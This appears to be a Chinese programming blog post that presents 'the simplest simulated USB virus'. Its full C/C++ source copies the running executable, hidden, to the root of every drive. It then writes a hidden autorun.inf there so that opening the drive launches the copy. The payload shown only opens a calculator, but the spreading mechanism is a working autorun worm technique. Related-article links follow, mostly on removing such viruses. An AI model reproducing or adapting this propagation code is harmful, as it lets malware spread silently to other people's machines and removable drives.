最简单的模拟U盘病毒(Autorun.inf)
autorun.inf是我们电脑使用中比较常见的系统文件 ,其作用是允许在双击磁盘时自动运行指定的某个文件。
下面介绍几个API函数
1.DWORD GetLogicalDriveStrings(DWORD nBufferLength, // size of bufferLPTSTR lpBuffer // drive strings buffer);
2.char *strncpy(char *dest,char *src,size_t n);第1个参数:char *strDest目的字符串指针。 第2个参数:const char *strSource源字符串指针。 第3个参数:size_t count 拷贝长度。 返回值:目的字符串指针。
下面是C/C++代码
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>char *gstrAutoRun = "[autorun]\\r\nopen=calc.exe \\r\nshell\\open\\Command=calc.exe \\r\nshell\\explore=资源管理器(&X) \\r\nshell\\explore\\Command=calc.exe \\r\nshellexecute=calc.exe\\r\nshell\\Auto\\Command=calc.exe";void Infect(char *pstrFilePath)
{char strDriveStrings[MAXBYTE] = { 0 };DWORD dwDriveStrLen = GetLogicalDriveStringsA(MAXBYTE, strDriveStrings);DWORD dwError = 0;for (size_t i = 0; i < dwDriveStrLen; i += 4){char strTargetPath[MAX_PATH] = { 0 }, strRoot[4] = { 0 };strncpy(strRoot, &strDriveStrings[i], 4);strcpy(strTargetPath, strRoot);strcat(strTargetPath, "demo.exe");if (!CopyFileA(pstrFilePath,strTargetPath,false)){dwError = GetLastError();}SetFileAttributesA(strTargetPath, FILE_ATTRIBUTE_HIDDEN);strcpy(strTargetPath, strRoot);strcat(strTargetPath, "autorun.inf");HANDLE hFile = CreateFileA(strTargetPath, GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,nullptr);DWORD dwLen = 0;WriteFile(hFile, gstrAutoRun, strlen(gstrAutoRun), &dwLen, nullptr);CloseHandle(hFile);}
}int main()
{char strSelfPath[MAX_PATH] = { 0 };GetModuleFileNameA(nullptr, strSelfPath, MAX_PATH);Infect(strSelfPath);return 0;
}
最简单的模拟U盘病毒(Autorun.inf)相关推荐
- 【转】U盘病毒autorun.inf的原理及查杀经验
******这是转载自别人博客的一篇文章,我也中了不止一次autorun.inf病毒,现将此文奉献出来,谢谢原作者的辛苦劳动!链接: *************************** ...
- 非常规手段免疫U盘病毒(Autorun.inf)
Autorun.inf是windows下操纵光盘行为的一个文件,需要放在光盘根目录下,部分操作对于硬盘或U盘也适用. 一般情况出现除光盘外的其他存储介质分区下十有八九不正常,很有可能是设了陷阱,让你打 ...
- 简单的反U盘病毒(删除不了的畸形文件夹)
很久的风行就是用的这种方法来防止用户删除它. 很久以前的一段时期也用次方法防U盘病毒 如下所示: 防U盘病毒的原理就是在每个盘创建一个这样的文件 下面先接受几个win API DWORD WINAPI ...
- U盘流行病毒autorun的分析及清除方法
U盘流行病毒的形态为autorun名称的隐藏文件,后缀名为inf.exe等十种,通常表现为双击无法打开机器盘符,只能右击再点打开:系统变慢.有的没有感觉到异样,不大影响使用,但硬盘根目录下仍然有各种名 ...
- 对Autorun.inf类U盘病毒的攻防经验总结
"RavMonE.exe"."rose.exe"."sxs.exe"."copy.exe"."setup.ex ...
- 对Autorun.inf类U盘病毒的攻防
"RavMonE.exe"."rose.exe"."sxs.exe"."copy.exe"."setup.ex ...
- autorun.inf U盘/光盘自动运行功能 完全操作手册
autorun.inf 是我们电脑使用中比较常见的文件之一 ,其作用是允许在双击磁盘时自动运行指定的某个文件.但是近几年出现了用autorun.inf文件传播木马或病毒,它通过使用者的误操作让目标程序 ...
- U盘防毒最强方案(创建删不掉的autorun.inf文件夹)(删除)
要创建window下无法删除的目录可以在(运行CMD)命令提示符中输入(将c:\改为目录所在路径) md c:\autorun.inf md c:\autorun.inf\killvirus-\ 要删 ...
- U盘防毒最强方案(创建删不掉的autorun.inf文件夹)
病毒,每个人都深受其害,痛恨不已,特别是现在移动设备MP3.MP4.手机.U盘.移动硬盘飞速发展的时代,病毒也随着这些移动设备和网络快速蔓延和滋生,所以如何防止病毒入侵到自己的爱机和移动设备上就太重要 ...
最新文章
- AngularJS开发指南7:AngularJS本地化,国际化,以及兼容IE低版本浏览器
- python变量类型之间转换_Python变量赋值类型转换
- 矩形覆盖-----批了外皮的亲蛙跳
- iOS底层探索之dyld(下):动态链接器流程源码分析
- 一万小时定律的数学解释
- Unity整体与单个缩放比例
- 阿里云毕龙飞:五个维度推进企业生产关系数字化
- 解决AD不能复制粘贴
- kali破解wifi密码
- Excel— 撤销工作表保护密码 的破解并获取原始密码
- 使用ActiveSync同步WinCE设备,并在局域网中调试网络程序
- Android之伪装QQ后台偷偷发短信
- 路由器wifi热点丢包率高_使用笔记本电脑和虚拟路由器创建自己的Wifi热点
- 计算机视觉学习1-图像处理
- Java阿凯_Java-7 面向对象(上)
- Python学习记录——1.print()函数与变量
- 不懂时间管理的本质,你只会越来越忙
- 考虑如何称呼团队成员和经理
- java 斗地主_Java实现简单的斗地主游戏
- 【大米粒计数】基于matlab GUI形态学大米粒颗粒识别【含Matlab源码 915期】